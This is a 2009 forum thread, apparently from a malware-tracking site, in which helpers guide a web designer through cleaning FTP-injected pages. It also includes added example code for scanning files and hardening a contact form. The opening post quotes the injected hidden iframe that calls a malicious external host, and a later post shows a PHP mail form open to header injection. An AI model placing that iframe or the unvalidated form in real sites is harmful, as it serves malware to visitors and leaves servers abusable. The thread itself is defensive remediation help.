Malware Domain List
Malware Related => Compromised Servers => Topic started by: #41baby on July 12, 2009, 02:10:49 pm
-
Hello,
I have been having problems with several websites I design/maintain. We thought the issue was dealt with 3 months ago but it keeps coming back. The following appears in any page named INDEX:
<iframe src="h[i]tt[/i]p://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
It causes a virus to be downloaded.
I have done everything the internet has suggested: malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday). I woke up this morning and the sites were again nailed with the virus.
I read on this list that it could have something to do with PHP code. Could it be my form code? I have one PHP form and one that is Flash with PHP that I got off the net.
If anyone here can help me out, that would be greatly appreciated.
After I get my password change (and I removed the FTP program's storage of the information), what should I do?
Thanks,
DN
MysteryFCM: Embedded HTML in BBCode tags
-
There's 4 main things you need to do;
1. Check your site's files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site
This should ALL be done from a known clean machine (i.e. not the machine you usually use).
If you've got a backup of the site's files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.
If your site uses a database, this will need to be checked as well.
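As an added example (not code from this thread), a small PHP command-line script for step #1: it walks a copy of the site's files and reports any <iframe> styled to be invisible, the pattern used by the injection quoted in the opening post. The path argument and the list of file extensions are assumptions.

```php
<?php
// Added example, not code from this thread. Walks a copy of a site's files and reports
// <iframe> tags styled to be invisible, the pattern used by the injection quoted in
// the opening post. Run it from a clean machine against a download of the server:
//   php find_hidden_iframes.php /path/to/site-copy   (path and extensions are assumptions)

// Returns [['line' => N, 'tag' => '<iframe ...>'], ...] for every iframe in $html that
// is hidden by CSS or sized to 0/1 pixels. Visible, legitimate iframes are not reported.
function find_hidden_iframes(string $html): array
{
    $hits = [];
    if (!preg_match_all('~<iframe\b[^>]*>~i', $html, $m, PREG_OFFSET_CAPTURE)) {
        return $hits;
    }
    foreach ($m[0] as [$tag, $offset]) {
        $hidden = preg_match('~visibility\s*:\s*hidden|display\s*:\s*none~i', $tag)
               || preg_match('~\b(?:width|height)\s*=\s*["\']?[01]\b~i', $tag);
        if ($hidden) {
            // Line number of the match, so it can be found in an editor.
            $line = substr_count(substr($html, 0, $offset), "\n") + 1;
            $hits[] = ['line' => $line, 'tag' => $tag];
        }
    }
    return $hits;
}

// Recursively scans every file under $root with one of the given extensions and
// returns "path:line  <tag>" strings, one per suspicious iframe.
function scan_site(string $root, array $exts = ['html', 'htm', 'php', 'js']): array
{
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!in_array(strtolower($file->getExtension()), $exts, true)) {
            continue;
        }
        $html = (string) file_get_contents($file->getPathname());
        foreach (find_hidden_iframes($html) as $hit) {
            $report[] = $file->getPathname() . ':' . $hit['line'] . '  ' . $hit['tag'];
        }
    }
    return $report;
}

if (PHP_SAPI === 'cli') {
    $root = $argv[1] ?? '.';
    $report = scan_site($root);
    echo $report ? implode("\n", $report) . "\n" : "No hidden iframes found under $root\n";
}
```

Anything it reports should be compared against your clean local copy before deleting; a match in a file you never wrote (or a file with no local counterpart) is a candidate for removal.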
-
Hello,
Thanks for the reply.
Questions from your answers:
1. Check your sites files (ALL of the files) for malicious code: the code keeps appearing and re-appearing. What I usually do is delete it from the server and upload the one from my computer which does not have it. Then, after 2 months (or in this case a couple days lately), it reappears. They only seem to attach the INDEX.HTML pages.
2. Check no shells were uploaded: I have no idea what you mean by this. Can you tell me how to check for "shells".
3. Change the FTP passwords: In the works.
4. Change any web based passwords for the site: I do have any.
5. This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups: This is always the part where I get really confused. The website files from my computer are always clean. They get infected once I put them online. I have checked them many times and they are clean. So, I just have to burn them to a disk, bring them to say, my lap-top (which I never used for uploading to the server before) and upload them?
6. If your site uses a database: I just have a basic package from www.namesecure.com. Not sure if it has a database. I do not think so.
Thanks for your answers and I look forward to clarifying what you already said.
DN
-
These frames were/are being inserted via compromised FTP last I heard, be sure the machine you're using to make changes from isn't compromised as well, I've found that to be the case more than once.
-
Hello,
These frames were/are being inserted via compromised FTP last I heard, be sure the machine you're using to make changes from isn't compromised as well, I've found that to be the case more than once.
Two (more) Questions:
1 - Any suggestions for checking my computer? I have done SEVERAL different scans and methods. Any suggestions would be appreciated. Perhaps I missed something.
2 - In terms of using another computer to upload: so I can never use my actual computer again? What if I need to change something on my website? My lap-top does not have the programs.
Thanks,
DN
-
Shells allow the attacker to compromise the site, even after the passwords are changed, as they can then do whatever they want via an HTTP interface. You can identify these by going through the files on the server, and deleting any that shouldn't be there (you can identify what shouldn't be there by checking your backups).
You can use your usual machine again, once you're sure it's clean. Without knowing which programs you've already tried, I can only suggest programs to use;
a-Squared
www.emsisoft.com
Malwarebytes AntiMalware
www.malwarebytes.org
ClamWin
www.clamwin.com
Kaspersky
www.kaspersky.com
the code keeps appearing and re-appearing. What I usually do is delete it from the server and upload the one from my computer which does not have it. Then, after 2 months (or in this case a couple days lately), it reappears. They only seem to attach the INDEX.HTML pages.
If you've not changed the FTP password yet, it won't matter how many times you replace the files, especially if this is how they got in - it will keep happening until the FTP password is changed (this should've been the first thing to have been done)
-
As an aside, if you would like help verifying your machine is clean, please see the following;
http://temerc.com/forums/viewtopic.php?f=12&t=18
-
Hello,
Thanks.
I will get my changed passwords hopefully on Monday.
I will then go through everything you have suggested.
I appreciate the help and will post again if it comes up again.
DN
-
No problem ..... if you require further help, please do not hesitate to pop back :)
-
Hello,
I do have one more question. I have noticed during my investigations on these viruses that it could be the PHP code of forms. I have also noticed that on one "under construction" site I have, the virus acted differently. That site got nailed with the virus but does NOT have the PHP form code; the virus is there in the code but does not activate.
Below is the code for my FLASH/PHP form.
I was wondering if there might be something that could be improved.
Thanks,
DN
---
<?php
// Flash/PHP contact form handler: reads the four form fields from the POST body and
// mails them to the site owner; the Flash movie reads back "success=yes" or "success=no".
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];
if( $contact_name == true )
{
    $sender = $contact_email;
    $receiver = "MY EMAIL ADDRESS";
    $client_ip = $_SERVER['REMOTE_ADDR'];
    $email_body = "Name: $contact_name \nEmail: $sender \nSubject: $contact_subject \nMessage: $contact_message \nIP: $client_ip";
    $extra = "From: $sender\r\n" . "Reply-To: $sender \r\n" . "X-Mailer: PHP/" . phpversion();
    // Subject line uses $contact_subject, the variable set from the form above.
    if( mail( $receiver, "Flash Contact Form - $contact_subject", $email_body, $extra ) )
    {
        echo "success=yes";
    }
    else
    {
        echo "success=no";
    }
}
?>
MysteryFCM: Embedded code in BBCode tags
-
Change;
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];
if( $contact_name == true )
To;
$contact_name = $_POST['name'];
$contact_name = stripslashes(htmlspecialchars($contact_name, ENT_QUOTES));
$contact_email = $_POST['email'];
if(strpos($contact_email, "@")==false){die('E-mail invalid');}
$contact_email = stripslashes(htmlspecialchars($contact_email, ENT_QUOTES));
$contact_subject = $_POST['subject'];
$contact_subject = stripslashes(htmlspecialchars($contact_subject, ENT_QUOTES));
$contact_message = $_POST['message'];
$contact_message = stripslashes(htmlspecialchars($contact_message, ENT_QUOTES));
if(isset($_POST['email']) && isset($_POST['message']))
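As an added example (not MysteryFCM's mod or DN's original), the whole handler rewritten with the checks suggested above plus a guard against e-mail header injection: the original copies the visitor's address straight into the From: and Reply-To: headers, so an address containing a line break could append extra headers to the outgoing mail. RECEIVER_ADDRESS and the function names are assumptions.

```php
<?php
// Added example, not the thread's own code. Contact form handler with input checks and
// a guard against e-mail header injection. User-supplied values that end up in mail
// headers (From:, Reply-To:, Subject:) must never contain CR or LF, otherwise a
// visitor can append headers such as Bcc: and turn the form into a spam relay.
// RECEIVER_ADDRESS is a placeholder for the site's real mailbox.

const RECEIVER_ADDRESS = 'owner@example.invalid';

// Returns a validated address or null. FILTER_VALIDATE_EMAIL rejects line breaks and
// other header-breaking characters, which a bare strpos('@') check does not.
function clean_email(string $raw): ?string
{
    $email = trim($raw);
    return filter_var($email, FILTER_VALIDATE_EMAIL) === false ? null : $email;
}

// HTML-encodes a field (as the suggested mod does) and, for header-bound values,
// collapses any line breaks so they cannot start a new header.
function clean_text(string $raw, bool $single_line = false): string
{
    $text = htmlspecialchars(trim($raw), ENT_QUOTES, 'UTF-8');
    return $single_line ? preg_replace('/[\r\n]+/', ' ', $text) : $text;
}

// Validates the POST fields and sends the mail; returns true on success.
function handle_contact_form(array $post, string $client_ip): bool
{
    if (!isset($post['name'], $post['email'], $post['subject'], $post['message'])) {
        return false;
    }
    $sender = clean_email($post['email']);
    if ($sender === null || trim($post['message']) === '') {
        return false;
    }
    $name    = clean_text($post['name'], true);
    $subject = clean_text($post['subject'], true);
    $message = clean_text($post['message']);

    $body = "Name: $name\nEmail: $sender\nSubject: $subject\nMessage: $message\nIP: $client_ip";
    // Reply-To carries the visitor's address; From stays an address on your own domain
    // so the receiving server does not treat the message as forged.
    $headers = "From: " . RECEIVER_ADDRESS . "\r\n"
             . "Reply-To: $sender\r\n"
             . "X-Mailer: PHP/" . phpversion();
    return mail(RECEIVER_ADDRESS, "Flash Contact Form - $subject", $body, $headers);
}

echo handle_contact_form($_POST, $_SERVER['REMOTE_ADDR'] ?? '') ? "success=yes" : "success=no";
```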
-
I also wrote a spambot filter that you may want to consider adding to your forms;
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool
There's a vanilla PHP mod at;
http://forum.hosts-file.net/viewtopic.php?f=69&t=1597
-
Hello,
I cannot express how much I appreciate this.
Should I change it and upload AFTER the new passwords are in place?
I was thinking, I could delete the entire website and upload my backups after I do a double check of my computer. I know none of the web pages on my computer are affected. Still, the virus could be on my computer. I will get it checked using ALL the methods you mentioned above.
Thanks,
DN
-
If you've got a backup, even better. This will save you having to identify shells and manually remove malicious code. However, this should only be done AFTER;
1. FTP passwords are changed
2. Your machine is confirmed as clean (unless of course, you do this from a secondary machine known to be clean)
3. ALL files currently on your site's FTP server are deleted
Again, I must stress, if this is done before the passwords are changed and before the machine is confirmed as clean, there is nothing preventing this happening again.
-
Hello,
I checked my website's server and I do not see any files I do not recognize. Every file that is on the server, that is on my computer is clean.
I will follow your instructions to the letter.
Thank you,
Derek
-
No problem ... :)
-
Hello,
I also read you can do something with the .HTACCESS file?
Is this true?
I deleted the entire websites that were affected and will be running ALL the scans you suggested tonight.
Once I get the OK from that site you suggested (that my computer is ok), I will re-load the sites with the new passwords.
Derek
MysteryFCM - I sent you a private email question (sorry, meant to post here).
-
I also read you can do something with the .HTACCESS file?
Is this true?
This is indeed true, yes. This file has been known to be modified to redirect to malicious sites, so should also be replaced with a backup if possible.
MysteryFCM - I sent you a private email question (sorry, meant to post here).
No problem :)
-
Hello,
By the way, I checked my server and I do not have a .HTACCESS file.
Is this a problem?
DN
-
That's not a problem at all :)
You can create one however;
http://www.freewebmasterhelp.com/tutorials/htaccess/
-
Hello,
Ok, my HijackThis log was checked and clean.
They also made me do three other scans, all of which were clean.
I am not sure I understand the tutorials for the htaccess.
Do I need one for it to work?
Thanks,
DN
-
You don't need a .htaccess, no. It is generally recommended however.
Now your machine has the all clear, you can delete the files on the server, and replace them with the clean backups :) (assuming your FTP password has been changed now?)
-
Hello,
Before I started the malware check on my computer, I went on all three servers that I deal with and deleted the files.
I checked my files on my computer and they are clean.
The company I deal with changes the passwords and emails to me so I should get them today.
I have done everything you suggested.
I hope this ends the problem.
Thanks,
Derek
-
My pleasure :)
-
Hello,
I see this line in one of my pages:
<!-- saved from url=(0022)http://internet.e-mail -->
Does it mean anything?
DN
-
That means the page was saved from somewhere else.
Is the file one of yours? (can you post a copy of it? (zipped please))
-
Hello,
They are the files from my computer.
They appear to be on all my files.
Thanks,
DN
-
Where were the files obtained from? (i.e. did you use a crawler or such, to backup an online copy of your site).
My reason for asking is that the line in question is only ever seen when a downloader of some description has been used to create an offline copy of a website. It is highly unusual for files to contain this otherwise.
-
Hello,
I have no idea. I create the site on my computer and upload it to the server. I never had a back-up.
What should I do with that line?
Can I delete it?
DN
-
You can delete that line, yes :)